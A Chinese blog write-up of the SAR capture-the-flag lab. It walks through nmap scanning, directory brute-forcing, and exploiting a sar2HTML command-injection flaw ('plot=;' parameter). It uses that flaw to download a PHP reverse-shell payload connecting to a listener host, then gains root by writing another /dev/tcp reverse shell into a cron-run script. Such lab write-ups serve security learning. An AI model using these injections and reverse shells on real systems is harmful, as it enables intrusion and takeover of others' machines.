首页 > 其他分享 >SAR -searchsploit

SAR -searchsploit

时间:2023-05-03 17:23:45浏览次数:35  
标签:shell http sudo 28.35 192.168 searchsploit SAR php

主机发现

sudo nmap -sn 192.168.28.0/24

TCP端口扫描:sudo nmap -sT --min-rate 10000 -p- 192.168.28.35 -oA nmapscan/ports

端口tcp扫描sudo nmap -sT -sV -sC -O -p80 192.168.28.35 -oA nmapscan/detial

端口udp扫描sudo nmap -sU --top-ports 20 192.168.28.35 -oA nmapscan/udp

脆弱性扫描 sudo nmap --script=vuln -p80 192.168.28.35 -oA nmapscan/vuln

访问http服务

并进行目录爆破

sudo dirb -u http:/xx -w xx

发现robots.txt和phpinfo.php 

phpinfo.php一般用于进行针对性的爆破等等

robots.txt一般用于禁止目录访问和目录导览的,所以里面存放的一些有可能是目录的名字

访问robots.txt发现只有sar2HTML,将它当成目录放入路径中

http://192.168.28.35/sar2HTML

成功访问

发现是一个软件

通过searchsploit漏洞库查找是否有这个漏洞

search sar2html  找到一个rce,但是因为search容易将数字当成关键字搜索,所以一般要将数字给去掉

search sar -m 47204  #将rce给拖下到当前路径下 

查看用法

 访问http://192.168.28.35/index.php?plot=;cat /etc/passwd 

鼠标点击select host 命令执行结果会输出到底部的滑动上

所以进行写马反弹shell的操作

反弹shell

vim shell.txt

<?php exec("/bin/bash -c ' bash -i >& /dev/tcp/192.168.28.29/1234 0>&1'");?>

kali监听

nc -lvnp 1234 并开放一个web服务 sudo php -S 0:80

利用漏洞进行远程下载并执行

http://192.168.28.35/sar2HTML/index.php?plot=;wget http://192.168.28.29/shell.txt -O shell.php

再访问shell.php既可以反弹shell

http://192.168.28.35/sar2HTML/shell.php

成功getshell

权限分析

whoami   uname -a   ip a   sudo -l 

完善shell的交互性

clear --报错

export term=xterm-color

clear --成功

sudo -l 报错

简单翻一下目录

家目录等等

查看计划任务

cat /etc/crontab

查看到用root运行了finally的脚本.脚本指向write.sh 查看write.sh的用户属主是谁进行修改操作

将我们上传的shell.txt内的内容复制到write.sh中可以运行后既可以提权

vi write.sh

#!/bin/bash

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.28.35/1111 0>&1 

 

标签:shell,http,sudo,28.35,192.168,searchsploit,SAR,php
From: https://www.cnblogs.com/lisenMiller/p/17369336.html

相关文章

  • 论文解读《Interpolated Adversarial Training: Achieving robust neural networks wi
    论文信息论文标题:InterpolatedAdversarialTraining:Achievingrobustneuralnetworkswithoutsacrificingtoomuchaccuracy论文作者:AlexLambVikasVermaKenjiKawaguchiAlexanderMatyaskoSavyaKhoslaJuhoKannalaYoshuaBengio论文来源:2022NeuralNetworks论文地址:dow......
  • Cycle GAN:Unpaired Image-to-Image Translation using Cycle-Consistent Adversarial
    paper:https://arxiv.org/pdf/1703.10593.pdf[2017]code参考:https://github.com/junyanz/pytorch-CycleGAN-and-pix2pixhttps://zhuanlan.zhihu.com/p/79221194https://blog.csdn.net/fangjin_kl/article/details/128117396https://www.bilibili.com/video/BV1kb4y197P......
  • Caesar一个全新的敏感文件发现工具
    https://github.com/0ps/Caesar 一 支持主流平台:得益于golang的跨平台优势。一次编译,到处运行。二 强大的并发:golang的并发独树一帜。12线程下能实现每秒千级请求。为了安全性,默认只设置了3线程。三 路径记忆功能:Caesar可以记忆路径的击中次数,下次运行的时候,击中次......
  • codeforces 118D D. Caesar's Legions(dp)
    题目链接:codeforces118D题目大意:给出n1个1,n2个2,给出k1和k2代表连续的1和2的最大长度,问能够构造的合法的不同串的数量。题目分析:能够递推,所以想到能够利用dp做。首先我们定义状态,dp[i][j][k][2]代表以1或2结尾,结尾相同的元素的数量为k,1的总数是j的当前序列长度为i的串的数量。首先......
  • Adversarial Robust Deep Reinforcement Learning Requires Redefining Robustness
    郑重声明:原文参见标题,如有侵权,请联系作者,将会撤销发布! ......
  • 论文解读(VAT)《Virtual Adversarial Training: A Regularization Method for Supervise
    论文信息论文标题:VirtualAdversarialTraining:ARegularizationMethodforSupervisedandSemi-SupervisedLearning论文作者:TakeruMiyato,S.Maeda,MasanoriKoyama,S.Ishii论文来源:2020ECCV论文地址:download 论文代码:download视屏讲解:click1前言提出问题:在......
  • Meerkat 2021 pulsar timing workshop 学习笔记(一)
    Thejoyofpulsars,byProfMatthewBaile,SwinburneUniversityofTechnologyhttps://www.youtube.com/watch?v=qG_hMzTCEX4&t=988s笔记不保证正确性(英语不行),最好观看原视频 1.引力天才们伽利略,第一个把望远镜指向天空的人,发现了木星有卫星开普勒,为行星绕太阳绕选给出了严......
  • 论文解读(PGD)《Towards deep learning models resistant to adversarial attacks》
     论文信息论文标题:Towardsdeeplearningmodelsresistanttoadversarialattacks论文作者:AleksanderMadry,AleksandarMakelov,LudwigSchmidt,DimitrisTsipras,AdrianVladu论文来源:ICLR2018论文地址:download 论文代码:download视屏讲解:click1 介绍对抗攻击2......
  • 论文解读(FGSM)《Explaining and Harnessing Adversarial Examples》
    论文信息论文标题:ExplainingandHarnessingAdversarialExamples论文作者:IanJ.Goodfellow,JonathonShlens,ChristianSzegedy论文来源:ICLR2015论文地址:download 论文代码:download视屏讲解:click1 介绍对抗攻击2方法扰动:$\eta=\varepsilon\operat......
  • 迁移学习(PAT)《Pairwise Adversarial Training for Unsupervised Class-imbalanced Dom
    论文信息论文标题:PairwiseAdversarialTrainingforUnsupervisedClass-imbalancedDomainAdaptation论文作者:WeiliShi,RonghangZhu,ShengLi论文来源:KDD2022论文地址:download 论文代码:download视屏讲解:click1摘要提出问题:类不平衡问题;解决方法:提出了一......